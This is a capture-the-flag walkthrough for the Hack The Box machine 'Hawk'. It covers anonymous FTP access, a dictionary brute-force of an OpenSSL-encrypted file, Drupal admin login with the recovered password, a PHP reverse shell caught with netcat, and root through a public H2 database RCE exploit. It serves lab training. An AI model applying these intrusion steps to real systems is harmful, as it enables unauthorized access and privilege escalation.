This box requires you to fumble around with SSL and .enc files. Takes some bruteforcing and luck…

Enumeration

Nmap ftw.

nmap -sC -sV -o- -oA initial 10.10.10.102 Nmap 7.70 scan initiated Wed Jul 18 18:42:26 2018 as: nmap -sC -sV -p- -oA inital 10.10.10.102 Nmap scan report for 10.10.10.102 Host is up (0.030s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.10.16.23 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA) | 256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA) |_ 256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Welcome to 192.168.56.103 | 192.168.56.103 5435/tcp open tcpwrapped 8082/tcp open http H2 database http console |_http-title: H2 Console 9092/tcp open XmlIpcRegSvc?

So we have HTTP (80), SSH (22), FTP (21), HTTP H2 database (8082) and some random stuff (5435, 9092). Lets start by browsing the FTP port.

ftp 10.10.10.102 Connected to 10.10.10.102. 220 (vsFTPd 3.0.3) Name (10.10.10.102:root): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp&amp;gt; ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages 226 Directory send OK. ftp&amp;gt; cd messages 250 Directory successfully changed. ftp&amp;gt; ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp&amp;gt; ls -lhra 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 240 Jun 16 22:21 .drupal.txt.enc drwxr-xr-x 3 ftp ftp 4096 Jun 16 22:14 .. drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 . 226 Directory send OK. ftp&amp;gt; get .drupal.txt.enc local: .drupal.txt.enc remote: .drupal.txt.enc 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes). 226 Transfer complete. 240 bytes received in 0.00 secs (1.4486 MB/s) ftp&amp;gt; exit 221 Goodbye.

What you see above is that I connected to the FTP server, logged in anonymously. the initial ls command didn’t show anything, but using ls -lhra (including showing hidden files) shows a hidden file (recognizable by the .) called .drupal.txt.enc.

A file with .enc extension means that the file is encrypted. You can verify this with the file command:

file drupal.txt.enc drupal.txt.enc: openssl enc'd data with salted password, base64 encoded

Lets use base64 to decode the content.

base64 -d drupal.txt.enc &gt; drupal.txt.decoded

After reading up on (SSL) encryption through this link, I decided to use bruteforce-salted-openssl with the rockyou wordlist. I guess I got lucky here and selected the correct cipher (AES-256-CBC) and digest (SHA256) for for decryption.

bruteforce-salted-openssl -v 10 -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 ciphertext Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s. Tried passwords: 31 Tried passwords per second: inf Last tried password: pretty Password candidate: friends Tried passwords: 6255562 Tried passwords per second: 625556.200000 Last tried password: lester2411 Tried passwords: 13280069 Tried passwords per second: 664003.450000 Last tried password: 13413011

Lets use the ‘friends’ password to decrypt the file

openssl aes-256-cbc -d -in drupal.txt.decoded -out login.txt -k friends *** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. cat login.txt Daniel, Following the password for the portal: [P]encilKeyboardScanner123 Please let us know when the portal is ready. Kind Regards, IT department

So we have the password for the drupal site. Password = [P]encilKeyboardScanner123. Lets start exploiting the Drupal site.

Exploitation

I’ve tried logging into the site with the username ‘admin’ and the aforementioned password. And voila, I was logged in.

Whenever I encounter a CMS system like this, I will try to get a php reverse shell, since most of these systems support php. However, on Drupal you need to enable this since it is not enabled my default. Just to be certain, I also run droopescan to see if any vulnerabilities show up. I did an unauthenticated scan, just to see what came back.

droopescan scan -u 10.10.10.102 [+] Site identified as drupal. [+] Themes found: seven http://10.10.10.102/themes/seven/ garland http://10.10.10.102/themes/garland/ [+] Possible interesting urls found: Default changelog file - http://10.10.10.102/CHANGELOG.txt Default admin - http://10.10.10.102/user/login [+] Possible version(s): 7.58 [+] Plugins found: image http://10.10.10.102/modules/image/ profile http://10.10.10.102/modules/profile/ php http://10.10.10.102/modules/php/

Version 7.58 is not vulnerable to Drupalgeddon2 and nothing really stands out. So let’s continue down the PHP path. Enable php filter through the modules page.

I have good experiences with the laudanum php reverse shell, which is the one created by pentest monkey. Laudanum should be in most pentesting distro’s (at least Kali and Parrot), use locate to find it:

locate shell | grep php *Snip*<br data-mce-bogus="1"> /usr/share/laudanum/php/php-reverse-shell.php /usr/share/laudanum/php/shell.php

Copy paste the content op php-reverse-shell.php into a new article. Set the format tot PHP code. Don’t forget to edit the IP and port field. Press add or preview when done and…

nc -lnvp 8082 listening on [any] 8082 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.102] 36426 Linux hawk 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 12:39:36 up 5 days, 14:13, 0 users, load average: 0.00, 0.00, 0.04 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data

Browse to /home/daniel/user.txt for the user flag.

Privilege Escalation

I order to do some additional enumeration on the box, I pulled in LinEnum.sh and ran it from /tmp. I did this by running a simple HTTP server on my machine and using wget on the Hawk machine to pull the script in.

On my machine, in the folder in which LinEnum.sh is located:

python -m SimpleHTTPServer 8081

On the Hawk machine, I wentto /tmp so I have a place to write files to and then:

wget ipofmymachine:8081/LinEnum.sh

After running LinEnum.sh, I saw the following result:

root 818 0.0 0.0 4628 864 ? Ss Dec09 0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar root 819 0.1 4.9 2329256 49160 ? Sl Dec09 9:22 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar

This looks like the H2 database that is running on port 8082. It seems like the proces is running as root. That’s interesting. It even specifies the version. Let’s look into searchsploit:

searchsploit H2 Database *SNIP*<br data-mce-bogus="1"> H2 Database - 'Alias' Arbitrary Code Execution | exploits/java/local/44422.py H2 Database 1.4.196 - Remote Code Execution | exploits/java/webapps/45506.py H2 Database 1.4.197 - Information Disclosure | exploits/linux/webapps/45105.py

Ah yes, remote code execution. Sounds like the thing we need. I just copied the contents of that file into exploit.py. Then I used the wget method as noted above to copy the file to Hawk. Execute to get:

www-data@hawk:/tmp$ python3 exploit.py -H 127.0.0.1:8082 python3 exploit.py -H 127.0.0.1:8082 [*] Attempting to create database [+] Created database and logged in [*] Sending stage 1 [+] Shell succeeded - ^c or quit to exit h2-shell$ whoami root h2-shell$

Done!

As always, excellent video by ippsec on this box.